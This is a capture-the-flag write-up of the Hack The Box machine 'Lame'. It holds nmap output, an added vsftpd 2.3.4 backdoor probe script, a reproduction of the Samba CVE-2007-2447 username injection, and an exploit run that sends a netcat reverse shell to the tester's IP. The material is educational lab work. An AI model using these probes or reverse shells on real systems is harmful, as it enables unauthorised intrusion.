HTB: Lame – Writeup

Details

This machine is Lame from Hack The Box, and is a retired machine. Its IP was 10.10.10.3

Recon Phase

Knowing the system was on 10.10.10.3, I carried out an nmap version scan to take a look

root@kali:~# nmap -sV 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.13s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.26 seconds

Shell Hunting

vsftpd 2.3.4 has a known backdoor: if the username sent at login contains the two characters ":)", a bind shell is opened on port 6200, so I tried it out. Unfortunately it didn't work, so this version must be patched. Moving on, I carried out another Nmap scan, this time letting it run the default enumeration scripts for more details
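The vsftpd 2.3.4 backdoor probe described above, written out as an added example (this is not code from the original post): it logs in with a username containing ":)", then tries to talk to the bind shell that a trojaned build opens on 6200. So that it can be exercised offline, the block also contains a constructed stand-in for the FTP daemon (`FakeVsftpd`) that listens on ephemeral ports instead of 21 and 6200 and answers `id` with a canned line; those ports, the fake banner and the canned output are assumptions for the demo only. Note that the probe returns `None` both when the build is clean and when nothing can reach the backdoor port, so against a real host a filtered 6200 (the scan above shows 996 filtered ports) looks the same as a patched daemon unless you check the port separately.

```python
import socket
import threading
import time


def probe_vsftpd_backdoor(host, ftp_port=21, backdoor_port=6200,
                          timeout=3.0, retries=5, delay=0.2):
    """Send a login whose username contains ':)' and then try to use the
    bind shell the trojaned vsftpd 2.3.4 opens on backdoor_port.

    Returns the bytes the shell answered to 'id', or None when nothing
    accepted a connection on backdoor_port (clean build, or port unreachable)."""
    with socket.create_connection((host, ftp_port), timeout=timeout) as ctl:
        ctl.recv(1024)                       # 220 banner
        ctl.sendall(b"USER probe:)\r\n")     # the ':)' byte sequence is the trigger
        ctl.recv(1024)                       # 331 password prompt
        ctl.sendall(b"PASS x\r\n")           # a trojaned daemon never answers this
    # The shell takes a moment to appear on a real host, so retry briefly.
    for _ in range(retries):
        try:
            with socket.create_connection((host, backdoor_port), timeout=timeout) as sh:
                sh.sendall(b"id\n")
                return sh.recv(1024)
        except OSError:                      # refused or timed out
            time.sleep(delay)
    return None


class FakeVsftpd(threading.Thread):
    """Constructed stand-in for vsftpd 2.3.4 (not the real daemon) so the
    probe can run offline. It speaks just enough FTP for one login attempt."""

    def __init__(self, backdoored=True):
        super().__init__(daemon=True)
        self.backdoored = backdoored
        self.ctl = socket.socket()
        self.ctl.bind(("127.0.0.1", 0))
        self.ctl.listen(1)
        self.ftp_port = self.ctl.getsockname()[1]
        self.shell = socket.socket()
        self.shell.bind(("127.0.0.1", 0))    # bound but NOT listening until triggered
        self.shell_port = self.shell.getsockname()[1]

    def run(self):
        conn, _ = self.ctl.accept()
        conn.sendall(b"220 (vsFTPd 2.3.4)\r\n")
        lines = conn.makefile("rb")
        user = lines.readline()
        conn.sendall(b"331 Please specify the password.\r\n")
        lines.readline()                     # the PASS line
        if self.backdoored and b":)" in user:
            self.shell.listen(1)             # the "spawned" bind shell
            sh, _ = self.shell.accept()
            if sh.recv(1024).strip() == b"id":
                sh.sendall(b"uid=0(root) gid=0(root)\n")   # canned demo output
            sh.close()
        else:
            try:
                conn.sendall(b"530 Login incorrect.\r\n")
            except OSError:
                pass
        conn.close()
        self.ctl.close()
        self.shell.close()


def run_demo(backdoored):
    """Start a fake daemon (trojaned or clean) and probe it."""
    srv = FakeVsftpd(backdoored)
    srv.start()
    return probe_vsftpd_backdoor("127.0.0.1", srv.ftp_port, srv.shell_port)


if __name__ == "__main__":
    print("trojaned build:", run_demo(True))
    print("clean build   :", run_demo(False))
```

Against a real target call `probe_vsftpd_backdoor(host)` with the default ports; the retry loop is there because the real backdoor forks a listener after the login, so an immediate connect can race it.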

root@kali:~# nmap -sVC 10.10.10.3
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-16 09:28 EST
Nmap scan report for 10.10.10.3
Host is up (0.20s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.16
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -2d21h56m17s, deviation: 0s, median: -2d21h56m17s
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-01-13T06:32:49-05:00
|_smb2-time: Protocol negotiation failed (SMB2)

This revealed the Samba version as 3.0.20-Debian, which has a known RCE vulnerability, CVE-2007-2447 (command injection through the "username map script" option, where the client-supplied username is handed to /bin/sh). There is a Metasploit module for this, but while I'm learning I prefer to do it myself, so I implemented a copy of the exploit https://github.com/Jack-Barradell/exploits/blob/master/CVE-2007-2447/cve-2007-2447.py and set up a listener to receive the shell
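Why the username is enough to get code execution, as an added example (this is a constructed reproduction of the vulnerable pattern, not Samba's source and not the author's exploit script): affected Samba builds with "username map script" configured built a shell command line by concatenating the script path and the client-supplied username, so shell metacharacters in the name are interpreted. The block puts that pattern next to the hardened form, which passes the name as a single argv element so no shell ever parses it (the general remediation for this bug class, not necessarily the exact Samba patch). The `/=` prefix and backtick shape of the username follow the public exploits; `/bin/true` stands in for whatever map script a site would configure, and the marker file in a fresh temp directory is how the demo detects that the smuggled command ran.

```python
import os
import subprocess
import tempfile

DEVNULL = subprocess.DEVNULL


def vulnerable_username_map(script, username):
    """Pattern behind CVE-2007-2447: the client-supplied username is glued
    into a command string that /bin/sh parses, so backticks, ';', '|' and
    friends inside the name are executed. Constructed reproduction only."""
    subprocess.run(f"{script} {username}", shell=True, check=False,
                   stdout=DEVNULL, stderr=DEVNULL)


def hardened_username_map(script, username):
    """Same lookup with the username passed as one argv element: no shell
    parses it, so metacharacters reach the script as literal text."""
    subprocess.run([script, username], check=False,
                   stdout=DEVNULL, stderr=DEVNULL)


def cve_2007_2447_username(command):
    """Username of the shape used against Samba 3.0.20-3.0.25rc3: the
    leading '/=' is harmless padding and the backticks make the shell run
    `command` as a substitution before the map script itself is invoked."""
    return f"/=`{command}`"


def demonstrate(handler):
    """Feed the injected username to a handler and report whether the
    smuggled command actually ran (it would create the marker file)."""
    marker = os.path.join(tempfile.mkdtemp(), "pwned")   # constructed marker path
    username = cve_2007_2447_username(f"touch {marker}")
    handler("/bin/true", username)                      # '/bin/true' = assumed map script
    return os.path.exists(marker)


if __name__ == "__main__":
    print("shell concatenation ran the payload:", demonstrate(vulnerable_username_map))
    print("argv passing ran the payload:       ", demonstrate(hardened_username_map))
```

In the writeup the `command` slot carries the `nc -e /bin/bash ...` reverse shell; the only server-side requirement is that "username map script" is set at all, because the substitution runs before the configured script does.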

root@kali:~# nc -nvlp 4444

Then I ran the exploit

root@kali:~# python3 cve-2007-2447.py -t 10.10.10.3 -p 445 -c "nc -e /bin/bash 10.10.14.16 4444"
[+] Generating exploit
[+] Exploit sent

And looked back at my listener

connect to [10.10.14.16] from (UNKNOWN) [10.10.10.3] 43358

A shell connected back, so I tested it

# id
uid=0(root) gid=0(root)

It's a root shell, so I can grab the flags

# cd /home
# ls -la
drwxr-xr-x  6 root    root    4096 Mar 14  2017 .
drwxr-xr-x 21 root    root    4096 May 20  2012 ..
drwxr-xr-x  2 root    nogroup 4096 Mar 17  2010 ftp
drwxr-xr-x  4 makis   makis   4096 Jan 11 06:25 makis
drwxr-xr-x  2 service service 4096 Apr 16  2010 service
drwxr-xr-x  3    1001    1001 4096 May  7  2010 user
# cd makis
# ls -la
drwxr-xr-x 4 makis makis 4096 Jan 11 06:25 .
drwxr-xr-x 6 root  root  4096 Mar 14  2017 ..
-rw------- 1 makis makis 1107 Mar 14  2017 .bash_history
-rw-r--r-- 1 makis makis  220 Mar 14  2017 .bash_logout
-rw-r--r-- 1 makis makis 2928 Mar 14  2017 .bashrc
drwx------ 2 makis makis 4096 Jan 13 06:25 .gconf
drwx------ 2 makis makis 4096 Jan 13 06:25 .gconfd
-rw-r--r-- 1 makis makis  586 Mar 14  2017 .profile
-rw-r--r-- 1 makis makis    0 Mar 14  2017 .sudo_as_admin_successful
-rw-r--r-- 1 makis makis   33 Mar 14  2017 user.txt
# cat user.txt
[REDACTED]

That's the user flag, now for the root flag

# cd /root
# ls -la
drwxr-xr-x 13 root root 4096 Jan 10 22:30 .
drwxr-xr-x 21 root root 4096 May 20  2012 ..
-rw-------  1 root root  373 Jan 10 22:30 .Xauthority
lrwxrwxrwx  1 root root    9 May 14  2012 .bash_history -> /dev/null
-rw-r--r--  1 root root 2227 Oct 20  2007 .bashrc
drwx------  3 root root 4096 May 20  2012 .config
drwx------  2 root root 4096 May 20  2012 .filezilla
drwxr-xr-x  5 root root 4096 Jan 10 22:30 .fluxbox
drwx------  2 root root 4096 May 20  2012 .gconf
drwx------  2 root root 4096 May 20  2012 .gconfd
drwxr-xr-x  2 root root 4096 May 20  2012 .gstreamer-0.10
drwx------  4 root root 4096 May 20  2012 .mozilla
-rw-r--r--  1 root root  141 Oct 20  2007 .profile
drwx------  5 root root 4096 May 20  2012 .purple
-rwx------  1 root root    4 May 20  2012 .rhosts
drwxr-xr-x  2 root root 4096 May 20  2012 .ssh
drwx------  2 root root 4096 Jan 10 22:30 .vnc
drwxr-xr-x  2 root root 4096 May 20  2012 Desktop
-rwx------  1 root root  401 May 20  2012 reset_logs.sh
-rw-------  1 root root   33 Mar 14  2017 root.txt
-rw-r--r--  1 root root  118 Jan 10 22:30 vnc.log
# cat root.txt
[REDACTED]

And the machine is completed!
